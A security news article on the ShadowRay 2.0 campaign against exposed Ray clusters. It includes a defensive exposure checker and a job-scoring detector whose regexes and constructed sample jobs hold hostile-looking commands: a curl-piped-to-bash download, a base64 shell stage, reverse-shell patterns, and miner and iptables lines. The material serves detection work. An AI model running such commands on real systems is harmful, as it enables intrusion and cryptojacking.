ShadowRay 2.0: AI Orchestration Framework Ray Hacked for Autonomous Cryptojacking
A new wave of attacks targeting infrastructure built around modern machine-learning systems has been uncovered by the Oligo Security team. Researchers found that a group of threat actors has launched a large-scale operation, dubbed ShadowRay 2.0, in which AI infrastructure is turned against itself: the platforms that orchestrate machine-learning workloads are hijacked to run the attackers' own tooling. The campaign focuses on publicly accessible instances of Ray, a widely used framework for distributed task execution deployed across commercial and research environments alike.
According to Oligo, the attacks exploit CVE-2023-48022, a flaw disclosed in 2023: the Ray dashboard and its Jobs API (port 8265 by default) accept requests without any authentication, so anyone who can reach the port can submit a job whose entrypoint is an arbitrary shell command executed on the head node with the privileges of the Ray process. Anyscale, Ray's maintainer, disputed the CVE and treats the missing authentication as a design assumption: Ray is meant to run inside a trusted, isolated network. In practice, however, many organizations bind the dashboard to a public interface, handing attackers a remote code execution primitive. Over the past two years, the number of exposed Ray instances has surpassed two hundred thousand, and a portion of them is already compromised.
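To find out whether a head node in your own address ranges is exposed in the way the campaign relies on, the following added check (not Oligo's or the Ray project's code) requests the dashboard's /api/version endpoint, which Ray serves without credentials, and classifies the answer. It assumes Ray's default dashboard port 8265; the host names in SAMPLE_HOSTS are placeholders.

```python
"""Check whether a Ray dashboard answers unauthenticated (CVE-2023-48022 exposure).

Added example, not Oligo's or the Ray project's code. Assumes Ray's default
dashboard port (8265) and its /api/version endpoint; SAMPLE_HOSTS are placeholders.
"""
import json
import socket
import urllib.error
import urllib.request

RAY_DASHBOARD_PORT = 8265  # Ray default; the Jobs API is served under /api/jobs/ on the same port


def classify(status, body):
    """Map a dashboard response to an exposure verdict.

    status: HTTP status code, or None when no HTTP response was obtained.
    body:   raw response body (bytes), possibly empty.
    """
    if status is None:
        return "unreachable"          # filtered, closed, or timed out
    if status in (401, 403, 407):
        return "protected"            # a proxy or auth layer is gating the port
    if status == 200:
        try:
            doc = json.loads(body.decode("utf-8", "replace"))
        except ValueError:
            return "other"            # 200 but not Ray's JSON: some other service
        if isinstance(doc, dict) and "ray_version" in doc:
            return "exposed"          # Ray answered with no credentials at all
    return "other"


def probe(host, port=RAY_DASHBOARD_PORT, timeout=3.0):
    """Issue one GET /api/version and classify the result."""
    url = f"http://{host}:{port}/api/version"
    req = urllib.request.Request(url, headers={"User-Agent": "ray-exposure-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return classify(resp.status, resp.read())
    except urllib.error.HTTPError as err:  # a non-2xx answer still tells us something
        return classify(err.code, err.read() or b"")
    except (urllib.error.URLError, socket.timeout, OSError):
        return classify(None, b"")


def report(hosts, prober=probe):
    """Probe each host; `prober` is injectable so the logic can be exercised offline."""
    return {host: prober(host) for host in hosts}


SAMPLE_HOSTS = ["ray-head.internal.example", "10.0.0.12"]  # placeholders, not real targets

if __name__ == "__main__":
    for host, verdict in report(SAMPLE_HOSTS).items():
        print(f"{host}: {verdict}")
```

Run it only against inventory you own. An "exposed" verdict means the same vantage point can also POST to /api/jobs/ and have its entrypoint executed on the head node, which is exactly the condition the campaign abuses; "protected" indicates something in front of Ray (a reverse proxy or gateway) is demanding credentials, which Ray itself never does.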
Throughout the campaign, the attackers — operating under the alias IronErn440 — employed techniques more typical of DevOps teams: malicious logic was distributed through GitLab and GitHub, continuously updated depending on region, hardware type, and node configuration.
Oligo documented several attack waves. The first involved placing malicious updates on GitLab, but once the repository was removed, the attackers swiftly migrated their infrastructure to GitHub, created new accounts, and resumed distribution of their tooling.
A central element of the operation was autonomous propagation across Ray clusters: once the head node accepted a job, the attackers used Ray's own scheduler, the legitimate mechanism for placing tasks on worker nodes, to run malicious tasks on every node in the cluster. These chains included reconnaissance, stealthy installation of cryptocurrency miners, creation of reverse-shell channels, and deployment of persistence mechanisms. The payloads ran as processes renamed to look like system services and drove the GPUs with mining workloads that did not appear as Ray tasks, so Ray's own monitoring showed nothing unusual.
Signs of competition between criminal groups were observed inside compromised environments: IronErn440’s miners actively terminated rival processes, blocked their addresses, and rewrote network-filtering rules. In some cases, operators of the campaign gained access to sensitive information, including cloud service keys, application parameters, trained models, and databases — extending the threat well beyond illicit crypto-mining. Certain nodes even showed attempts to repurpose compromised resources for DDoS attacks.
The investigation suggests the operation may have persisted for over a year and affected infrastructure across multiple continents. The growing number of exposed Ray servers, combined with the absence of an upstream fix because the missing authentication is treated as intended behaviour, created conditions for recurring exploitation and rapid evolution of attack methods.
Experts emphasize that the underlying issue remains deployment misconfiguration and lack of isolation, as Ray was never designed for exposure to the open internet. Ray binds the dashboard to localhost by default; it is an explicit --dashboard-host=0.0.0.0 (or an equivalent cloud template) that puts the Jobs API on a public interface. Recommended measures include auditing deployments with the Ray open ports checker that Anyscale published, keeping the dashboard on a loopback or private address and reaching it through an SSH tunnel or an authenticating reverse proxy, filtering the head node's ports at the network level (8265 for the dashboard, 6379 for the GCS, 10001 for the Ray client) so that only cluster members and administrators can reach them, and monitoring the compute environment for anomalies such as job submissions with unfamiliar entrypoints, GPU utilization not accounted for by scheduled Ray tasks, and processes whose names imitate system services.
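For hunting, the job list that the same dashboard exposes (GET /api/jobs/, each record carrying the job's entrypoint and runtime_env) is the first place to look for the kind of submissions described above. The script below is an added example, not Oligo's or the Ray project's code: it scores each record against indicators drawn from the behaviour reported in the campaign (piping a script from GitHub or GitLab into a shell, base64-decoded stages, detached processes that outlive the job, miner and reverse-shell strings, firewall edits, killing rival processes, persistence). The indicator weights and threshold are assumptions for illustration, and SAMPLE_JOBS is constructed, not real incident data.

```python
"""Score Ray job records (GET /api/jobs/) for ShadowRay-style submissions.

Added example, not Oligo's or the Ray project's code. Weights, threshold and
SAMPLE_JOBS are assumptions / constructed data for illustration only.
"""
import re

# (pattern, weight, label): weights are an assumption; calibrate on your own baseline.
INDICATORS = [
    (re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(ba)?sh\b"), 4, "remote-script-pipe"),
    (re.compile(r"raw\.githubusercontent\.com|gitlab\.com/.+/-/raw/"), 3, "git-hosted-payload"),
    (re.compile(r"base64\s+(-d|--decode)\b"), 3, "base64-stage"),
    (re.compile(r"\bnohup\b|\bsetsid\b|\bdisown\b"), 2, "detached-process"),
    (re.compile(r"\bxmrig\b|stratum\+tcp://|--donate-level"), 5, "miner"),
    (re.compile(r"/dev/tcp/|\bnc\b.*\s-e\b|bash\s+-i\b"), 5, "reverse-shell"),
    (re.compile(r"\b(iptables|nft|ufw)\b"), 3, "firewall-edit"),
    (re.compile(r"\bpkill\b|\bkillall\b"), 2, "kills-processes"),
    (re.compile(r"\bcrontab\b|/etc/systemd/system/|systemctl\s+enable"), 3, "persistence"),
]
THRESHOLD = 5  # assumption: one strong indicator or two weak ones


def commands_of(job):
    """Every attacker-controllable string in a record: the entrypoint plus any
    pip specs in runtime_env, which Ray also acts on when the job starts."""
    cmds = [job.get("entrypoint") or ""]
    pip = (job.get("runtime_env") or {}).get("pip")
    if isinstance(pip, dict):          # {"packages": [...], "pip_check": ...} form
        pip = pip.get("packages")
    if isinstance(pip, str):           # path to a requirements file
        cmds.append(pip)
    elif isinstance(pip, list):
        cmds.extend(str(p) for p in pip)
    return cmds


def score_job(job):
    """Return (score, labels) for one record; each label counts once per job."""
    score, labels = 0, []
    for cmd in commands_of(job):
        for pattern, weight, label in INDICATORS:
            if label not in labels and pattern.search(cmd):
                score += weight
                labels.append(label)
    return score, labels


def suspicious_jobs(jobs, threshold=THRESHOLD):
    """Map submission_id -> findings for every record at or above the threshold."""
    findings = {}
    for job in jobs:
        score, labels = score_job(job)
        if score >= threshold:
            findings[job["submission_id"]] = {
                "score": score, "labels": labels, "entrypoint": job.get("entrypoint"),
            }
    return findings


# Constructed records in the shape of Ray's job details; not from a real cluster.
SAMPLE_JOBS = [
    {"submission_id": "raysubmit_legit01", "status": "SUCCEEDED",
     "entrypoint": "python train.py --epochs 10",
     "runtime_env": {"pip": ["torch==2.3.0"]}},
    {"submission_id": "raysubmit_stage01", "status": "RUNNING",
     "entrypoint": "curl -s https://raw.githubusercontent.com/placeholder-org/repo/main/setup.sh | bash",
     "runtime_env": {}},
    {"submission_id": "raysubmit_stage02", "status": "RUNNING",
     # renamed binary plus nohup so the payload outlives the Ray job that started it
     "entrypoint": "echo ZWNobyBoaQ== | base64 -d | sh; nohup ./kthreadd >/dev/null 2>&1 &",
     "runtime_env": {}},
    {"submission_id": "raysubmit_miner01", "status": "RUNNING",
     "entrypoint": ("pkill -f xmrig; iptables -A OUTPUT -d 198.51.100.7 -j DROP; "
                    "./.cache/sysd --url stratum+tcp://pool.invalid:3333"),
     "runtime_env": {}},
    {"submission_id": "raysubmit_legit02", "status": "RUNNING",
     "entrypoint": "nohup python serve.py &", "runtime_env": {}},
]

if __name__ == "__main__":
    for sid, f in suspicious_jobs(SAMPLE_JOBS).items():
        print(f"{sid}: score={f['score']} {f['labels']}\n    {f['entrypoint']}")
```

The threshold is what keeps a lone nohup in a legitimate serving job below the line while a base64 stage combined with a detached process crosses it; the miner record scores highest because it stacks the miner string with a firewall edit and a process kill, the same combination the campaign used to evict rival miners. Feed it the JSON from your own head nodes and tune the weights against the jobs your teams actually submit.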